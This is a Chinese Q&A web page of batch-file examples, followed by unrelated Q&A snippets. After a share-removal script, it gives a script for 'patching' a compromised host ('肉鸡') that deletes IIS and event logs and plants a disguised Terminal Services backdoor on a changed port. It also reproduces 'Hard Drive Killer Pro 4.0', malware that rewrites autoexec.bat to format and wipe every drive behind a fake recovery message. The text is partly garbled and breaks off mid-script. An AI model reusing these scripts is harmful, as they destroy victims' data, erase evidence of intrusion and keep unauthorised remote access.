我的位置:页游 > 问答 bat文件的实例说明
问bat文件的实例说明
 美术系插班生
美术系插班生
-
 你走
你走
删除win2k/xp系统默认共享的批处理
cut here then s**e as.bat or.cmd file
echo preparing to delete all the default shares.when ready pres any key.
pause
echo off
rem check parameters if ** show usage.
if {%1}={} goto:usage
rem code start.
echo.
echo
echo.
echo now deleting all the default shares.
echo.
net share %1$/delete
net share %2$/delete
net share %3$/delete
net share %4$/delete
net share %5$/delete
net share %6$/delete
net share %7$/delete
net share %8$/delete
net share %9$/delete
net stop server
net start server
echo.
echo all the shares h**e been deleteed
echo.
echo
echo.
echo now modify the reg**try to change the system default properties.
echo.
echo now creating the reg**try file
echo windows reg**try editor version 5.00>c:\delshare.reg
echo[hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters]>>c:\delshare.reg
echo autosharewks=dword:00000000>>c:\delshare.reg
echo autoshareserver=dword:00000000>>c:\delshare.reg
echo nowing using the reg**try file to chang the system default properties.
regedit/s c:\delshare.reg
echo deleting the temprotarily files.
del c:\delshare.reg
goto:end
usage
echo.
echo
echo.
echo☆a example for batch file☆
echo☆[use batch file to change the sysytem share properties.]☆
echo.
echo author:ex4rch
echo.
echo error:not enough parameters
echo.
echo☆please enter the share d**k you wanna delete☆
echo.
echo for instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo if the d**klable ** not as c:d:e:,please chang it youself.
echo.
echo example:
echo if locak d**klable are c:d:e:x:y:z:,you should chang the command into:
echo delshare c d e x y z ipc admin print
echo.
echo*you can delete nine shares once in a useing*
echo.
echo
goto:eof
end
echo.
echo
echo.
echo ok,delshare.bat has deleted all the share you assigned.
echo
echo.
echo
echo.
eof
echo end of the batch file
cut here then s**e as.bat or.cmd file
全面加固系统(给肉鸡打补丁)
cut here then s**e as.bat or.cmd file
echo windows reg**try editor version 5.00>patch.dll
echo[hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters]>>patch.dll
echo autoshareserver=dword:00000000>>patch.dll
echo autosharewks=dword:00000000>>patch.dll
rem[禁止共享]
echo[hkey_local_machine\system\currentcontrolset\control\lsa]>>patch.dll
echo restrictanonymous=dword:00000001>>patch.dll
rem[禁止匿名登录]
echo[hkey_local_machine\system\currentcontrolset\services\netbt\parameters]>>patch.dll
echo smbdeviceenabled=dword:00000000>>patch.dll
rem[禁止及文件访问和打印共享]
echo[hkey_local_machine\system\currentcontrolset\services\@remotereg**try]>>patch.dll
echo start=dword:00000004>>patch.dll
echo[hkey_local_machine\system\currentcontrolset\services\schedule]>>patch.dll
echo start=dword:00000004>>patch.dll
echo[hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon]>>patch.dll
echo shutdownwithoutlogon=0>>patch.dll
rem[禁止登录前关机]
echo dontd**playlastusername=1>>patch.dll
rem[禁止显示前一个登录用户名称]
regedit/s patch.dll
cut here then s**e as.bat or.cmd file
下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。regedit/s patch.dll
net stop w3svc
net stop event log
del c:\winnt\system32\logfiles\w3svc1\*.*/f/q
del c:\winnt\system32\logfiles\w3svc2\*.*/f/q
del c:\winnt\system32\config\*.event/f/q
del c:\winnt\system32dtclog\*.*/f/q
del c:\winnt\*.txt/f/q
del c:\winnt\*.log/f/q
net start w3svc
net start event log
rem[删除日志]
net stop lanmanserver /y
net stop schedule /y
net stop remotereg**try /y
del patch.dll
echo the server has been patched,h**e fun.
del patch.bat
rem[禁止一些危险的服务。echo[hkey_local_machine\system\currentcontrolset\control\termina l server\winstations\rdp-tcp]>>patch.dll
echo portnumber=dword:00002010>>patch.dll
echo portnumber=dword:00002012>>patch.dll
echo[hkey_local_machine\system\currentcontrolset\services\termdd]>>patch.dll
echo start=dword:00000002>>patch.dll
echo[hkey_local_machine\system\currentcontrolset\services\secuservice]>>patch.dll
echo start=dword:00000002>>patch.dll
echo errorcontrol=dword:00000001>>patch.dll
echo imagepath=hex⑵:25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>patch.dll
echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\>>patch.dll
echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00>>patch.dll
echo objectname=localsystem>>patch.dll
echo type=dword:00000010>>patch.dll
echo description=keep record of the program and windows **。patch.dll
echo d**playname=microsoft eventlog>>patch.dll
echo[hkey_local_machine\system\currentcontrolset\services\termservice]>>patch.dll
echo start=dword:00000004>>patch.dll
copy c:\winnt\system32\termsrv.exec:\winnt\system32\eventlog.exe
rem[修改3389连接,端口为8210(十六进制为00002012),名称为microsoft eventlog,留条后路]
hard drive killer pro version 4.0
(玩批处理到这个水平真的不容易了。cut here then s**e as.bat or.cmd file
echo off
rem th** program ** dedecated to a very special person that does not want to be named.
start
cls
echo please wait while program loads.
call attrib-r-h c:\autoexec.bat>nul
echo@echo off>c:\autoexec.bat
echo call format c:/q/u/autosample>nul>>c:\autoexec.bat
call attrib+r+h c:\autoexec.bat>nul
rem drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for drive checking takes place here.
rem drivechk.bat ** the file name under the root directory.
rem as far as the drive detection and drive variable settings,dont worry about how it
rem works,its d\*amn to complicated for the **erage or even the expert batch programmer.
rem except for tom l**edas.
echo@echo off>drivechk.bat
echo@prompt%comspec%f/c vol%1:$b find vol>nul>{t}.bat
comspec%e:2048/c {t}.bat>>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc>>drivechk.bat
cls
echo please wait while program loads.
rem when errorlevel ** 1,then the above ** not true,if 0,then its true.
rem opposite of binary rules.if 0,it will elaps to the next command.
echo@prompt%comspec%f/c dir%1:.\/ad/w/-p$b find bytes>nul>{t}.bat
comspec%e:2048/c {t}.bat>>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc>>drivechk.bat
cls
echo please wait while program loads.
rem if errorlevel ** 1,then the drive specified ** a removable media drive-not ready.
rem if errorlevel ** 0,then it will elaps to the next command.
echo@prompt dir%1:.\/ad/w/-p$b find 0 bytes free>nul>{t}.bat
comspec%e:2048/c {t}.bat>>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=drive%1>>drivechk.bat
cls
echo please wait while program loads.
rem if its errorlevel 1,then the specified drive ** a hard or floppy drive.
rem if its not errorlevel 1,then the specified drive ** acd-romdrive.
echo:enddc>>drivechk.bat
rem drive checking insertion ends here.enddc stands for end ddrⅳe checking.
rem now we will use the program drivechk.bat to attain valid drive **rmation.
sampledrv
for%a in(%alldrive%)do call drivechk.bat%a>nul
del drivechk.bat>nul
if%drive.=.set drive=c
form_del
call attrib-r-h c:\autoexec.bat>nul
echo@echo off>c:\autoexec.bat
echo echo loading windows,please wait while microsoft windows recovers your system.>>c:\autoexec.bat
echo for%a in(%drive%)do call format%a:/q/u/autosample>nul>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo loading windows,please wait while microsoft windows recovers your system.>>c:\autoexec.bat
echo for%a in(%drive%)do call c:\temp.bat%a bunga>nul>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo loading windows,please wait while microsoft windows recovers your system.>>c:\autoexec.bat
echo for%a in(%drive%)call deltree/y%a:\>nul>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo loading windows,please wait while microsoft windows recovers your system.>>c:\autoexec.bat
echo for%a in(%drive%)do call format%a:/q/u/autosample>nul>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo loading windows,please wait while microsoft windows recovers your system.>>c:\autoexec.bat
echo for%a in(%drive%)do call c:\temp.bat%a bunga>nul>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo loading windows,please wait while microsoft windows recovers your system.>>c:\autoexec.bat
echo for%a in(%drive%)call deltree/y%a:\>nul>>c:\autoexec.bat
echo cd\>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo welcome to the land of death.munga bungas multiple hard drive killer version 4.0.>>c:\autoexec.bat
echo echo if you ran th** file,then sorry,i just made it.the purpose of th** program ** to tell you the following.>>c:\autoexec.bat
echo echo 1.to make people aware that security should not be taken for granted.>>c:\autoexec.bat
echo echo 2.love ** important,if you h**e it,truly,dont let go of it like i did!c:\autoexec.bat
echo echo 3.if you are not a vegetarian,then you are a murderer,and ...
-
问 传奇mir200文件夹下面都有些说明?提问时间:2024-04-26 16:56:03答 保留用户id,人物装备以及行会信息的方法:请备份下列文件:d:\mir\mud2\dbsrv200\fdb\ 下的全部文件 人物装备资料d:\mir\mud2\...
-
问 猫的说明文 300字提问时间:2024-04-26 08:30:42答 猫是一种漂亮的小动物,它乖巧、驯良,很讨人喜欢。它长着一个小巧玲珑的小面孔,上面有一双蓝宝石般的大眼睛,还有一个红扑扑的小鼻子,它虽然是食肉动物,可是长得一点都...
-
问 安全生产设施的定义?举例说明!谢谢(⊙o⊙)哦提问时间:2024-04-26 01:11:25答 安全设施共分三大类,十三项。为方便你理解,我每项都举出例子⒈预防事故设施⑴检测、报警设施压力、温度、液位、流量、组份等报警设施:压力表、温度计都算可燃气体、有毒...
-
问 我解压到resident_evil_5-gamersky.7z压缩文件,后面怎么样弄请详细讲解,那个文件到那个文件说明下提问时间:2024-04-26 10:17:25答 解压后是好几十个名字一样的压缩文件,不用管,继续随便解压一个文件就行。到当前文件夹或同名文件夹都可以。
-
问 生物入侵的实例提问时间:2024-04-26 16:47:03答 展开全部(1)一种来自亚洲的斑马贻贝已经在美国疯狂蔓延,使当地贻贝和一些鱼类数量急剧下降。受灾地区包括五大湖区和密西西比河东部流域内的密西西比、田纳西、坎伯兰、...
-
问 bat的各种代码。整人的最好提问时间:2024-04-26 10:51:33答 这是一个**程序,运行后会出现n个本地磁盘,但是对电脑没有什么实际伤害。echo offfor%i in(a b c d e f g h i j k l m n...
-
问 桥的说明文提问时间:2024-04-26 05:57:11答 平 望 的 桥平望二中 黄酉林平望是著名的江南水乡,相传古时此地自南正北有塘路鼎分于葭苇之间,天光水色,一望皆平,由此得名平望.古老的大运河与波涛汹涌的太浦河在...
-
问 举例说明什么叫“专横霸道”?提问时间:2024-04-26 09:31:46答 东汉大将军梁商的儿子梁冀,肩膀上耸,眼角倒竖,说起话 来口齿不清。他从小放荡不羁,喜好喝酒、打猎、斗鸡。靠了他父亲和当皇后的妹妹的权势,官越做越大。梁商死后,汉...
-
问 文件解压缩下来只有说明提问时间:2024-04-26 07:10:08答 你先不解压缩,先用 winrar打开这个压缩文件,然后看看里面有什么文件,如果只有你看到的那个说明文件,那么说明这个压缩文件实际上就只有那个说明文件.如果看到了...
-
问 关于蚂蚁的说明文提问时间:2024-04-26 09:07:38答 蚂蚁是人们常见的一类昆虫,很容易识别。一般体小(0.5mm-3cm),颜色有黑、褐、黄、红等,体壁具弹性,光滑或有毛。口器咀嚼式,上颚发达。触角膝状,4~13节...
























